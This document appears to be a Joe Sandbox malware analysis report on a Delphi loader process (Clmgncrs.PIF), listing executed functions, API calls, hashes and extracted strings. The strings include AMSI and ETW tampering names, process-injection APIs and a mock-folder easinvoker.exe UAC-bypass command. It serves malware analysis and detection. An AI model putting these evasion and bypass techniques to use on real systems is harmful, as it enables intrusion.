Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Clmgncrs.PIFPID: 6472, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	403
Total number of Limit Nodes:	28

Executed Functions

Function 029DCA40 Relevance: 216.4, APIs: 9, Strings: 110, Instructions: 8183COMMON

Download Yara Rule

Strings

NtWaitForSingleObject, xrefs: 029E67F9
BCryptVerifySignature, xrefs: 029DCF72, 029E585B, 029E6428
DllRegisterServer, xrefs: 029DD169
DlpNotifyPreDragDrop, xrefs: 029E65CF
C:\Users\Public\Libraries, xrefs: 029DDA1F
SetUnhandledExceptionFilter, xrefs: 029E6D20
connect, xrefs: 029E6A56
I_QueryTagInformation, xrefs: 029E598F
CryptSIPGetInfo, xrefs: 029DCE5D
DllGetClassObject, xrefs: 029DD103, 029E0753, 029E6EFA
NtReadVirtualMemory, xrefs: 029E70C5
kernel32, xrefs: 029E6C05, 029E6C38, 029E6C6B, 029E6C9E, 029E6CD1, 029E6D04, 029E6D37
URL=file:", xrefs: 029E14D0
EnumServicesStatusExA, xrefs: 029E69DE
can, xrefs: 029E2438
NtSetSecurityObject, xrefs: 029E59A3
EtwEventWriteEx, xrefs: 029E722A
VirtualAllocEx, xrefs: 029E6C21
ws2_32, xrefs: 029E6A5B
UacScan, xrefs: 029DCC3A, 029DD1A2, 029DD29A, 029DD836, 029DE804, 029DED66, 029DF64C, 029DFC67, 029E0E98, 029E11C6, 029E1C5D, 029E2044, 029E2236, 029E2351, 029E417C, 029E4524, 029E45C9, 029E4764, 029E4AB3, 029E4E47, 029E4F54, 029E5129, 029E5574, 029E56F3, 029E5A5E, 029E5B80, 029E5ED5, 029E5FF2, 029E62A4
NtAlertResumeThread, xrefs: 029E6793
NtOpenProcess, xrefs: 029E59B7, 029E75E4
DlpGetWebSiteAccess, xrefs: 029E6668
mssip32, xrefs: 029DCE74, 029DCEA7, 029DCEDA
CreateProcessAsUserW, xrefs: 029E6A38, 029E6A65
[InternetShortcut], xrefs: 029E14C1
RtlCreateQueryDebugBuffer, xrefs: 029E685F
CreateProcessA, xrefs: 029E6A0B
iexpress.exe, xrefs: 029DD6D8
NtQueryVirtualMemory, xrefs: 029E6FC6
CryptSIPGetSignedDataMsg, xrefs: 029DCEC3
NtWriteVirtualMemory, xrefs: 029E71C4
C:\Windows\System32\, xrefs: 029DD4B1, 029E45A2, 029E50DE
C:\Users\Public\, xrefs: 029E09D8, 029E176A
SxTracerGetThreadContextDebug, xrefs: 029E6EC7
C:\\Users\\Public\\Libraries\\, xrefs: 029E0E3B
DllGetActivationFactory, xrefs: 029DD136
bcrypt, xrefs: 029DCF89, 029DCFBC, 029DCFEF, 029E5860, 029E5874, 029E5888, 029E643F
sppwmi, xrefs: 029E6F11
acS, xrefs: 029E2425
RtlAllocateHeap, xrefs: 029E67C6, 029E682C
NtQueryDirectoryFile, xrefs: 029E69A2
sppc, xrefs: 029E6F44, 029E6F77
NtGetWriteWatch, xrefs: 029E6F93
@^@, xrefs: 029DF0F0
Advapi, xrefs: 029E69C5, 029E69D4, 029E69E3, 029E69F2, 029E6A2E, 029E6A3D, 029E6A4C
GET, xrefs: 029DF7DB
http, xrefs: 029DF4AE
CreateProcessWithLogonW, xrefs: 029E6A47
WinHttp.WinHttpRequest.5.1, xrefs: 029DF6C2
NtAccessCheck, xrefs: 029E712B
MZP, xrefs: 029E5FC7
smartscreenps, xrefs: 029DD11A, 029DD14D, 029DD180
Kernel32, xrefs: 029E6A10, 029E6A1F, 029E6A6A
NtOpenSection, xrefs: 029E702C
.url, xrefs: 029E09E3
DlpGetArchiveFileTraceInfo, xrefs: 029E6635
.png, xrefs: 029DDBA3, 029DE2AB, 029E729B, 029E72E1, 029E732B, 029E7352
NtCreateSection, xrefs: 029E705F
EnumServicesStatusA, xrefs: 029E69C0
DlpCheckIsCloudSyncApp, xrefs: 029E6602
UacUninitialize, xrefs: 029E21BA
NtQuerySecurityObject, xrefs: 029E70F8
advapi32, xrefs: 029E5994
CreateProcessAsUserA, xrefs: 029E6A29
wintrust, xrefs: 029DCD0A, 029DCD31, 029DCD58
C:\\Windows \\System32\\easinvoker.exe, xrefs: 029E426E
OpenSession, xrefs: 029DCAAA, 029DD3B9, 029DD4DA, 029DD5E7, 029DD6EE, 029DDAB1, 029DDC66, 029DDE0C, 029DDFA8, 029DE0C1, 029DE235, 029DE8FC, 029DE9AA, 029DEC5C, 029DEE8A, 029DEF82, 029DF19D, 029DF54D, 029DF5D0, 029DF6E8, 029DF800, 029DF90C, 029DFB4F, 029DFDEE, 029DFF87, 029E0127, 029E03ED, 029E051D, 029E0828, 029E0953, 029E0AAB, 029E0BDB, 029E0C57, 029E100C, 029E1242, 029E13B6, 029E154A, 029E16FA, 029E1B65, 029E1D7B, 029E1E23, 029E1FC8, 029E22D5, 029E4100, 029E439B, 029E44A8, 029E4645, 029E487B, 029E4920, 029E4BAB, 029E4D4F, 029E504C, 029E5253, 029E5364, 029E5465, 029E576F, 029E58A3, 029E5ADA, 029E5DCB, 029E5E59, 029E61AC, 029E63B2, 029E6461, 029E66A1, 029E6898, 029E6AFC, 029E6DD5, 029E73FB, 029E756F
Ntdll, xrefs: 029E6989, 029E6998, 029E69A7, 029E69B6
C:\Windows\SysWOW64, xrefs: 029E22AC
VirtualAlloc, xrefs: 029E6BEE
FindCertsByIssuer, xrefs: 029DCD47
ScanString, xrefs: 029DCC9E, 029DCD77, 029DCEFC, 029DD08D, 029DD316, 029DD435, 029DD9AA, 029DEA26, 029DEBC2, 029DF07A, 029DF121, 029DF219, 029DF43E, 029DF764, 029DF988, 029DFA2D, 029DFD72, 029E00AB, 029E02BB, 029E0599, 029E0B27, 029E0CD3, 029E0F90, 029E1451, 029E15C6, 029E167E, 029E1CFF, 029E1F4C, 029E41F8, 029E431F, 029E442C, 029E4EC3, 029E52CF, 029E53E0, 029E57EB, 029E5D4F, 029E6228, 029E6336, 029E671D, 029E6914, 029E6B78, 029E6E51, 029E737F
NtOpenFile, xrefs: 029E71F7
BCryptRegisterProvider, xrefs: 029DCFD8, 029E5883
CreateProcessW, xrefs: 029E6A1A
endpointdlp, xrefs: 029E65E6, 029E6619, 029E664C, 029E667F
EnumServicesStatusW, xrefs: 029E69CF
WriteVirtualMemory, xrefs: 029E6CBA
SLGatherMigrationBlob, xrefs: 029E6F2D
NtDeviceIoControlFile, xrefs: 029E6993
ScanBuffer, xrefs: 029DCB72, 029DCDE7, 029DD011, 029DD556, 029DD663, 029DD76A, 029DDB2D, 029DDCE2, 029DDE88, 029DDF2C, 029DE13D, 029DE1B9, 029DE880, 029DEACA, 029DECD8, 029DEDE2, 029DEF06, 029DF334, 029DF4D1, 029DF87C, 029DFBCB, 029DFE8F, 029E0003, 029E01C3, 029E0371, 029E063F, 029E07AC, 029E08D7, 029E0DCB, 029E1088, 029E114A, 029E12BE, 029E133A, 029E1BE1, 029E1E9F, 029E213E, 029E4008, 029E4297, 029E46E8, 029E47FF, 029E499C, 029E4A37, 029E4B2F, 029E51A5, 029E54E1, 029E566C, 029E591F, 029E5C78, 029E5F51, 029E606E, 029E6130, 029E6559, 029E74F3
SLGetEncryptedPIDEx, xrefs: 029E6F60
ntdll, xrefs: 029E59A8, 029E59BC, 029E67AA, 029E67DD, 029E6810, 029E6843, 029E6876, 029E6FAA, 029E6FDD, 029E7010, 029E7043, 029E7076, 029E70A9, 029E70DC, 029E710F, 029E7142, 029E7175, 029E71A8, 029E71DB, 029E720E, 029E7241, 029E7274, 029E75E9
BCryptQueryProviderRegistration, xrefs: 029DCFA5, 029E586F
TRr, xrefs: 029E0331
IconIndex=, xrefs: 029E1524
FlushInstructionCache, xrefs: 029E6CED
WintrustAddActionID, xrefs: 029DCD20
TrustOpenStores, xrefs: 029DCCF9
psapi, xrefs: 029E6A01
spp, xrefs: 029E6EDE
NtQuerySystemInformation, xrefs: 029E6984
cmd /c "C:\\Windows \\System32\\easinvoker.exe", xrefs: 029E4309
RtlQueryProcessDebugInformation, xrefs: 029E69B1
LdrGetProcedureAddress, xrefs: 029E7191
NtQueryInformationThread, xrefs: 029E6FF9
NtMapViewOfSection, xrefs: 029E7092
LdrLoadDll, xrefs: 029E715E
OpenProcess, xrefs: 029E6C87
VirtualProtect, xrefs: 029E6C54
HotKey=, xrefs: 029E1658
DEEX, xrefs: 029DCA83
Initialize, xrefs: 029DCB0E, 029DD8B2, 029DDA35, 029DDBEA, 029DDD90, 029DE045, 029DEB46, 029DEFFE, 029DF2B8, 029DF3C2, 029DFAA9, 029DFCE3, 029DFF0B, 029E023F, 029E06DD, 029E0D4F, 029E0F14, 029E4DCB, 029E55F0, 029E59E2, 029E64DD, 029E6D59, 029E7477
EnumServicesStatusExW, xrefs: 029E69ED
^^Nc, xrefs: 029DDEFE, 029DEA9C
CryptSIPVerifyIndirectData, xrefs: 029DCE90
EtwEventWrite, xrefs: 029E725D
UacInitialize, xrefs: 029DCBD6, 029DD21E, 029DD92E, 029E0A2F, 029E4084, 029E4FD0, 029E5BFC, 029E6A80
EnumProcessModules, xrefs: 029E69FC

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: Path$FileName$CloseName_$AddressAttributesCurrentFreeLibraryModuleProcProcessWrite
String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TRr$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
API String ID: 976750054-1036056120
Opcode ID: 20d05f8306c397172c1904776551593227b5a6bbaf588f71a4bacc33637ea9d1
Instruction ID: cb9260b7e74709ed4a086ec9d4bac7db288bea660cda860279353140f30c051f
Opcode Fuzzy Hash: 20d05f8306c397172c1904776551593227b5a6bbaf588f71a4bacc33637ea9d1
Instruction Fuzzy Hash: 82F32035A0111A8BDB25FBA4DD80ADEB3BAEFC4700F1454E6D10AE7254DB31EE868F51

Uniqueness

Uniqueness Score: -1.00%

Function 029DB768 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 029DB7A3
NtClose.NTDLL(?), ref: 029DB81D

Part of subcall function 02984F68: SysFreeString.OLEAUT32 ref: 02984F76

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: Path$CloseFreeNameName_String
String ID:
API String ID: 11680810-0
Opcode ID: e5272d818eef4bf6dbcc10eb2e133887c686fa7da82a877d8afe7ff83227f9f7
Instruction ID: 633e05bd99c33f928fca9f863e91c24f3f71fd17f8066f77918f5e44ac27a452
Opcode Fuzzy Hash: e5272d818eef4bf6dbcc10eb2e133887c686fa7da82a877d8afe7ff83227f9f7
Instruction Fuzzy Hash: 99210371A403097AEB10EAD4CC52FDEB7BDEF88700F510461F600F71C0DA74AA049BA4

Uniqueness

Uniqueness Score: -1.00%

Function 029C7420 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(?,00000000,029C7598), ref: 029C7441
GetCurrentThreadId.KERNEL32 ref: 029C748F
GlobalAddAtomA.KERNEL32(00000000), ref: 029C74C5
RegisterClipboardFormatA.USER32(00000000), ref: 029C74DB

Part of subcall function 02997B44: RtlInitializeCriticalSection.NTDLL(List), ref: 02997B63

Part of subcall function 029C7028: SetErrorMode.KERNEL32(00008000), ref: 029C7041
Part of subcall function 029C7028: GetModuleHandleA.KERNEL32(USER32,00000000,029C718E,?,00008000), ref: 029C7065
Part of subcall function 029C7028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 029C7072
Part of subcall function 029C7028: LoadLibraryA.KERNEL32(imm32.dll,00000000,029C718E,?,00008000), ref: 029C708E
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmGetContext), ref: 029C70B0
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmReleaseContext), ref: 029C70C5
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmGetConversionStatus), ref: 029C70DA
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmSetConversionStatus), ref: 029C70EF
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmSetOpenStatus), ref: 029C7104
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmSetCompositionWindow), ref: 029C7119
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmSetCompositionFontA), ref: 029C712E
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmGetCompositionStringA), ref: 029C7143
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmIsIME), ref: 029C7158
Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmNotifyIME), ref: 029C716D
Part of subcall function 029C7028: SetErrorMode.KERNEL32(?,029C7195,00008000), ref: 029C7188

Part of subcall function 029D1538: GetKeyboardLayout.USER32(00000000), ref: 029D157D

Part of subcall function 029D2740: LoadIconA.USER32(02A17030,MAINICON), ref: 029D2837
Part of subcall function 029D2740: GetModuleFileNameA.KERNEL32(02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?,00000000,?,00000000,029C7598), ref: 029D2869
Part of subcall function 029D2740: OemToCharA.USER32(?,?), ref: 029D287C
Part of subcall function 029D2740: CharNextA.USER32(?,?,?,02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?,00000000), ref: 029D28BB
Part of subcall function 029D2740: CharLowerA.USER32(00000000,?,?,?,02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?), ref: 029D28C1

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,029C7598), ref: 029C755F
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 029C7570

Strings

ControlOfs%.8X%.8X, xrefs: 029C74A3
AnimateWindow, xrefs: 029C756A
Delphi%.8X, xrefs: 029C7452
USER32, xrefs: 029C755A

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: AddressProc$CharModule$CurrentErrorHandleLoadMode$AtomClipboardCriticalFileFormatGlobalIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 1041971040-1126952177
Opcode ID: 596b55d6de8ebc6c97aacc18fed5ffcef1521ba55dfb0096d07cc5d106562c32
Instruction ID: d3009d0b4f4fb3e02c48ae54e7beed683a7115e0a39f6cfe44d21549b97a8cf9
Opcode Fuzzy Hash: 596b55d6de8ebc6c97aacc18fed5ffcef1521ba55dfb0096d07cc5d106562c32
Instruction Fuzzy Hash: B5416874A442458FDB01FFE8E880AAEB7FEFF89310B114928E004EB311DA35A911CF65

Uniqueness

Uniqueness Score: -1.00%

Function 029D2740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(02A17030,MAINICON), ref: 029D2837
GetModuleFileNameA.KERNEL32(02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?,00000000,?,00000000,029C7598), ref: 029D2869
OemToCharA.USER32(?,?), ref: 029D287C
CharNextA.USER32(?,?,?,02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?,00000000), ref: 029D28BB
CharLowerA.USER32(00000000,?,?,?,02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?), ref: 029D28C1

Part of subcall function 029D2A94: GetClassInfoA.USER32(02A197F8,029EB674,?), ref: 029D2AF3
Part of subcall function 029D2A94: RegisterClassA.USER32(029EB650), ref: 029D2B0B
Part of subcall function 029D2A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 029D2BA7
Part of subcall function 029D2A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 029D2BC9

Strings

MAINICON, xrefs: 029D282A

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
String ID: MAINICON
API String ID: 2763768735-2283262055
Opcode ID: 995556d7eedb71118c428a68395e24c38429183637acd71a9c7bba158322b031
Instruction ID: 7d1df162d9a4b7a0ae1fe3491fc2edac1cf309d07a9c045a411803b9749fc7d3
Opcode Fuzzy Hash: 995556d7eedb71118c428a68395e24c38429183637acd71a9c7bba158322b031
Instruction Fuzzy Hash: BB517C70A042448FDB50EF68C984B857BE9AB55314F4884F9DC48CF346DBB6D888CF61

Uniqueness

Uniqueness Score: -1.00%

Function 029817C3 Relevance: 9.0, APIs: 7, Instructions: 288
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 0298186C
Sleep.KERNEL32(0000000A,00000000), ref: 02981882

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b46b512138b6ad634877d4a53894921a6a9e09f67c7a1c96825cd7302f1b5177
Instruction ID: 2e22ec370c97a64ff4165ce79bb45bcf7ddc9c4bc7cdaed7736df0d2bc480326
Opcode Fuzzy Hash: b46b512138b6ad634877d4a53894921a6a9e09f67c7a1c96825cd7302f1b5177
Instruction Fuzzy Hash: 86B1DF72A402118BCB15DF68E880366FBE5EF85325F1C8AAED45D8B385DB70D853CB90

Uniqueness

Uniqueness Score: -1.00%

Function 029A765C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00000008,02A1A374,00000048), ref: 029A7682

Part of subcall function 029A7618: SelectObject.GDI32(00000000,02A1A380), ref: 029A7633

Strings

MS Shell Dlg 2, xrefs: 029A76EC
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 029A76D8
Tahoma, xrefs: 029A76A4

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: ObjectSelect
String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
API String ID: 1517587568-1011973972
Opcode ID: 54e334919ddd790d12955e63f4b14e11634bde6d33a479fa726cdaf4eed160a2
Instruction ID: 38af1989fa052e3b4d87be50732b2198339344b3418f075d4fca7fd32d457093
Opcode Fuzzy Hash: 54e334919ddd790d12955e63f4b14e11634bde6d33a479fa726cdaf4eed160a2
Instruction Fuzzy Hash: 0B117370A40348AFDB41EFE8C862AADB7FAEB85700F5144A4E840D7650DB31AD11CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0299EA38 Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoA.USER32(02A197F8,029EAB1C,?), ref: 0299EA59
UnregisterClassA.USER32(029EAB1C,02A197F8), ref: 0299EA82
RegisterClassA.USER32(029EAAF8), ref: 0299EA8C
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0299EAD7

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: dcc92b45744b4b9fb120a15c8d4fe747f763d65bf6e9679c432c2ef7b6513138
Instruction ID: ba45364e118cf5fb9c354339fda94bbb047f33673e2d54d963d00aa2c17b9349
Opcode Fuzzy Hash: dcc92b45744b4b9fb120a15c8d4fe747f763d65bf6e9679c432c2ef7b6513138
Instruction Fuzzy Hash: 8E01A171A80101ABDE00FB9CDC80FDB779EFB58324F184911B951EB2A1CA31D851CB61

Uniqueness

Uniqueness Score: -1.00%

Function 029A0308 Relevance: 4.6, APIs: 3, Instructions: 132
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,029A04A2), ref: 029A0374
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,029A04A2), ref: 029A03DF
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 029A0444

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: cd8f067a29518bbeb85089f4d84f3c06aa81152d22b0ff5613b8d1bdc7d3d6f2
Instruction ID: 8ee12e5a0bfcdb1bb43fd252ed6403cfdc3058adc40882204c6a103dfd084fa0
Opcode Fuzzy Hash: cd8f067a29518bbeb85089f4d84f3c06aa81152d22b0ff5613b8d1bdc7d3d6f2
Instruction Fuzzy Hash: 9241A631A04309BFEB11EBA4C9A1B9EB7FAFF84304F148469E845A7251DB759F05DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0299F2A8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 0299F5A6

Strings

H, xrefs: 0299F35D

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 3e1ec927409ab28bb6dc10fbc3e659b2ae52c1145684c9f084882a3d396699b2
Instruction ID: 9e517c7f3d2ea5769022dc15d77d95ed53023ae405d146aab67343ad982a7314
Opcode Fuzzy Hash: 3e1ec927409ab28bb6dc10fbc3e659b2ae52c1145684c9f084882a3d396699b2
Instruction Fuzzy Hash: 1EB1E174A016089FDB10CFA8D480AADFBF6FF89324F248569E809EB760D735A845CF50

Uniqueness

Uniqueness Score: -1.00%

Function 029A04C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,029A0524), ref: 029A04F2

Strings

MS Shell Dlg 2, xrefs: 029A04C1, 029A04C3

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction ID: cc69fd0e9653b3991c4f0a87e54a1a2bf803ad33f6cf2596b73eb47cf316aabc
Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction Fuzzy Hash: 2BF030623092086BD704FAAD9D40FAB7BDDDBC5750F05803AB94CC7240DA21DC0987B5

Uniqueness

Uniqueness Score: -1.00%

Function 02984444 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ffc62c8a795cdba3c95c840fb379f549ef177c81c8d269e1d67dca3f486e3e8
Instruction ID: ce374b68530f55b2484267d1130ab7cfcc3cafb0982c1cd0ae4fc15069a08f8a
Opcode Fuzzy Hash: 6ffc62c8a795cdba3c95c840fb379f549ef177c81c8d269e1d67dca3f486e3e8
Instruction Fuzzy Hash: AF416B75C40206CFDB24EF64D4847AA7BE9FF49325F2D695AE8088B240CB34D9A2CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0298F6D0 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0298F6DF

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 953bfe9d18f7f9f0c99c00b0179d4b439ebc0b8704d7b98d0934842a1d081f23
Instruction ID: 194215c3812f7f388b11abb49741969271490a50e8718c0c38c61d122d464c03
Opcode Fuzzy Hash: 953bfe9d18f7f9f0c99c00b0179d4b439ebc0b8704d7b98d0934842a1d081f23
Instruction Fuzzy Hash: EDF0C26470011086BB257B38CCC467D239E6F81354BDC7865E0879BA11CB35CC0BC723

Uniqueness

Uniqueness Score: -1.00%

Function 0298F768 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0298F7A8

Memory Dump Source

Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: f2a64bd8e0af24b91cb871e90705f05e4ec4141a71d36be1446cc7c522c39933
